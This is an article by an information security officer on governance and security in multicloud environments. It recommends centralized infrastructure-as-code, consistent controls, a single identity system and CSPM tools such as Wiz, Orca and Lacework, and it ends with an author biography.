The cloud landscape has evolved from traditional on-premises virtualization to a complex array of cloud platforms operating simultaneously. This shift has introduced significant security challenges for enterprises. One of the primary drivers for adopting a multicloud strategy is the need to mitigate risks such as: 

*   Security vulnerabilities/zero-days 
    

However, these benefits come with inherent risks. Organizations must navigate the challenges of the following: 

*   Shared security controls: Implementing consistent security measures across different platforms can be challenging. 
    

*   Governance across multiple platforms: Ensuring compliance with various regulatory requirements can be complex. 
    

*   Varying compatibility: Third-party tools and services may not be compatible across all cloud environments. 
    

For example, companies that previously operated in a single cloud environment must now contend with the complexities of integrating and securing multiple cloud platforms, each with its own unique set of tools and protocols. The lack of coordination and governance in operations and deployments can lead to increased vulnerabilities and operational inefficiencies. Moreover, the scarcity of skilled professionals proficient in multiple cloud platforms exacerbates these challenges, making it crucial for organizations to invest in cross-functional training and development. 

**The Strategic Imperative of Governance and Security**

Effective governance is at the heart of a successful multicloud strategy. Organizations must establish clear guidelines and policies to manage the complexities of multiple cloud environments. Key governance aspects include: 

*   Defining roles and responsibilities: Clarifying who is responsible for cloud administration and security across different platforms. 
    

*   Deploying consistent security controls: Ensuring that security measures are uniformly applied across all cloud environments. 
    

*   Ensuring regulatory compliance: Meeting compliance requirements in each cloud environment.  
    

Security in a multicloud environment is particularly challenging, due to the expanded attack surface and the need for consistent security measures across different cloud platforms. A key aspect of managing security is the centralization of security operations. Centralizing the deployment of images and infrastructure-as-code (IaC) is essential for maintaining a secure and consistent cloud environment. For instance: 

*   Standardizing configurations: Establishing uniform configurations across all cloud environments to minimize the risk of security breaches. 
    

*   Automating security controls: Implementing automated security checks to reduce the likelihood of human error. 
    

Cloud security posture management (CSPM) tools play a critical role in this process. These tools enhance visibility across multiple cloud environments by providing a unified view of security risks. CSPM tools help organizations identify and prioritize risk mitigations according to their business requirements, ensuring that the most critical vulnerabilities are addressed promptly. By consolidating security data from various clouds into a single dashboard, these tools offer a comprehensive picture of the organization's security posture, enabling more effective decision-making. 

CSPM tools like Wiz, Orca, and Lacework go beyond basic security monitoring. They provide continuous assessment of cloud infrastructure, detect misconfigurations, and monitor compliance against frameworks such as CIS, PCI, NIST, and HIPAA. These tools also offer automation features, which can streamline incident response processes by automatically remediating identified risks or alerting security teams for further investigation. 

For instance, in my experience, Wiz and Orca have been particularly effective in identifying and mitigating risks in multicloud environments. These tools not only help prioritize the mitigation of various security risks but also provide structured guidance based on widely accepted baselines. Similarly, Lacework offers robust capabilities in anomaly detection, allowing organizations to identify unusual behaviors that may indicate security breaches or misconfigurations. 

**Taking Multicloud Management to the Finish Line**

Managing a multicloud environment requires a strategic approach that prioritizes governance, security, and centralization. Organizations must develop comprehensive strategies that align with their specific needs and invest in the necessary tools and skills to navigate the complexities of multicloud environments successfully. Understanding which offerings are unique to each cloud service provider allows organizations to leverage the strengths of different platforms effectively. Building a consistent monitoring capability across clouds is essential to maintain visibility and control over the entire infrastructure. 

The use of third-party tools suited for multicloud environments can enhance security and operational efficiency. Applying a framework with consistent policies and controls ensures that security standards are uniformly enforced across all cloud environments. Additionally, implementing a single identity system across clouds simplifies identity and access management, reducing the risk of unauthorized access and improving overall security posture. 

CSPM tools are essential components of this strategy, offering enhanced visibility and control across multiple cloud platforms. These tools provide a single, comprehensive view of the organization's security posture, enabling more informed decision-making and more effective risk management. As businesses continue to embrace the multicloud paradigm, those that successfully manage these complexities will be better positioned to thrive in an increasingly digital and interconnected world. 

**About the Author**

Information Security Officer, IMC Trading

Jatin Mannepalli, CISSP, CCSP is an information security officer (ISO) at IMC Trading, where he brings a deep commitment to managing security and risk across organizations. With more than 10 years of experience in the InfoSec space, he has built and led information security and risk management teams, and has also worked as a security consultant for major consulting firms like McKinsey & Company. Jatin is passionate about security governance and risk management, as well as developing technology-driven, customer-focused strategies that prioritize both organizational success and client satisfaction. Known for his holistic approach, he is dedicated to fostering a culture of security that aligns with the organization’s broader goals. In addition to his professional accomplishments, Jatin is recognized as one of the top voices in Information Security on LinkedIn. In his leisure time, he volunteers to promote security awareness in local communities and contributes to the cybersecurity community by helping develop exams for ISC2.

Tag

#acer